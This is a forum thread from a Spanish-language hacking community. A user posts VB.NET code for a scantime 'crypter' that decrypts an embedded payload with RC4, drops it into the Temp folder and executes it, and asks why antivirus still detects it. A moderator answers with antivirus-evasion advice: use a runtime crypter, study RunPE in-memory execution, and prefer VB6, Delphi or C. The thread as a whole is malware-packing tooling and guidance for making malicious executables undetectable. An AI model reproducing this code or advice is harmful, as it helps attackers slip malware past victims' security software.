Tu comunidad de Seguridad Informatica

Para ver Todo el contenido del foro es necesario estar Registrado!
Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules
Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post.
Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]

No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]

avatar
Usuario
Usuario

Ver perfil de usuario
el Mar Nov 23, 2010 9:04 am
Hey All,
Tengo crear un cripter que es 100%fud, pero en el momento de la apertura del fichero una parte del código es detectar en el expediente Temp...

I haved create a crypte who is 100% Fud , but when i open this file is deteted by AV in a Temp Folder..


_______________________________________________
On Error Resume Next
Dim TPath As String = System.IO.Path.GetTempPath
Dim file1, filezb4(), filezafter As String
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
file1 = Space(LOF(1))
FileGet(1, file1)
FileClose(1)
filezb4 = Split(file1, filesplit)
filezafter = rc4(filezb4(1), "///Shift75//")
FileOpen(5, TPath & "\Crypted.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, filezafter)
FileClose(5)
System.Diagnostics.Process.Start(TPath & "\Crypted.exe")
Me.Close()
End
________________________________________________________

Do you have a solution for help me? Thanks

avatar
Usuario
Usuario

Ver perfil de usuario
el Mar Nov 23, 2010 10:38 am
Well i dont know in Vb Net, but in "\Crypted.exe" encrypt in ASCII and Copy&paste without the (") and compile it.

Sorry for my Bad english

3AX 

avatar
Moderadores
Moderadores

Ver perfil de usuario
el Dom Abr 10, 2011 8:44 pm
Tu AV detecta el archivo en la carpeta temporales porque tu encriptador es Scantime y eso significa que el archivo encriptado es indetectable (100% Fud), pero cuando se ejecuta el archivo detectado se copia a la carpeta temporales. Los encriptadores Scantime sólo los recomiendo para que indetecte a los archivos para los Scans y nunca para ejecutar.

La solución a tu problema es un encriptador Runtime:
1-/ [Tienes que estar registrado y conectado para ver este vínculo]
2-/ [Tienes que estar registrado y conectado para ver este vínculo]
3-/ [Tienes que estar registrado y conectado para ver este vínculo]

Estudia las RunPE...Además VB.net no es un lenguage recomendable para encriptadores ni herramientas similares...Lo digo por experiencia. Te recomiendo un buen y sólido lenguage de programación como VB6, Delphi, C, C++, etc.

Saludos.

===============================================
===============================================

Your AV detects the file in the temporary folder because your encrypting is SCANTIME and that means that the encrypted file is undetectable (100% Fud), but when running the detected file is copied to the temporary folder. SCANTIME scripters only recommend to undetectable files for scans and never to run.

The solution to your problem is a encrypting Runtime:
1-/ [Tienes que estar registrado y conectado para ver este vínculo]
2-/ [Tienes que estar registrado y conectado para ver este vínculo]
3-/ [Tienes que estar registrado y conectado para ver este vínculo]

Study the RunPE ... Also VB.net is not a language suitable for encrypted or similar tools ... I speak from experience. I recommend a good, solid programming language such as VB6, Delphi, C, C + +, etc..

This post had to be posted in English Section\General

Greetings.

4Contenido patrocinado 



Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.